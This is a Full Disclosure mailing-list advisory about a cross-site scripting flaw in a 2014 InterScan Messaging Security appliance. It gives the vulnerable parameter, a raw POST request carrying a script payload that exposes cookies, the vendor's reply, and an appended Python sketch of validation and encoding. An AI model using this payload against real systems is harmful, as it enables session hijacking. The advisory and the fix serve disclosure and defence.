Message-ID: <CAOmMdVs8T15nwk1maZn9sK5KbYKb_gut5A8o=JKoOUR+LFAZFw@mail.gmail.com>
Date: Thu, 29 May 2014 12:55:03 -0300
From: William Costa <william.costa@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS Attacks vulnerability in InterScan Messaging Security
 Virtual Appliance 8.5.1.1516 (Zero-DAY)

I. VULNERABILITY
-------------------------

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516

II. DESCRIPTION
-------------------------
An XSS vulnerability has been detected in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr",
sent via POST to the page “/addWhiteListDomain.imss”.

III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
“addWhiteListDomainStr” correctly.


https://10.200.210.100:8445/addWhiteListDomain.imss

Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en-US; PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4; userID=1; LANG=en; wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuarantineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1; GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie);</script>)


https://vimeo.com/96757096


IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in the context of a
targeted user's browser, allowing session hijacking.

V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516

VI. SOLUTION
------------------------

Answer from Trend.

Hi William,


According to our Product Developers, this is not a vulnerability of our
product. All of the cookies (not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product - "OfficeScan" that may
be suitable for your environment.

I hope this information helps. Please let me know if you have additional
questions or clarifications.

Have a great day!



By William Costa

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
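
The missing validation described in section III, as an added server-side sketch (not code from the original post or from the vendor): the value of "addWhiteListDomainStr" is checked against a host-name allow-list and HTML-encoded before it is echoed back. The form markup and all function names are hypothetical, and the field is assumed to hold a plain DNS name.

```python
import html
import re
from urllib.parse import parse_qs

PARAM = "addWhiteListDomainStr"
# Constructed sample: the POST body shown in the advisory.
SAMPLE_BODY = PARAM + '=aaaa.com"><script>alert(document.cookie);</script>)'
PAYLOAD = SAMPLE_BODY.split("=", 1)[1]

# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_domain(value: str) -> bool:
    """Allow-list check: accept only a syntactically valid host name."""
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return len(labels) >= 2 and all(_LABEL.fullmatch(l) for l in labels)


def render_vulnerable(value: str) -> str:
    """Reflects the raw value into an attribute (hypothetical markup)."""
    return f'<input type="text" name="{PARAM}" value="{value}">'


def render_encoded(value: str) -> str:
    """Same markup, with the value HTML-encoded for an attribute context."""
    return f'<input type="text" name="{PARAM}" value="{html.escape(value, quote=True)}">'


def handle_post(body: str) -> tuple[int, str]:
    """Validate first; encode on output whether or not validation passed."""
    value = parse_qs(body, keep_blank_values=True).get(PARAM, [""])[0]
    status = 200 if is_valid_domain(value) else 400
    return status, render_encoded(value)


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # quote closes the attribute, tag is live
    print(handle_post(SAMPLE_BODY))     # rejected, and inert when echoed back
```

Validation alone is not the fix: the output encoding is what keeps any value that slips past the check from breaking out of the attribute.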
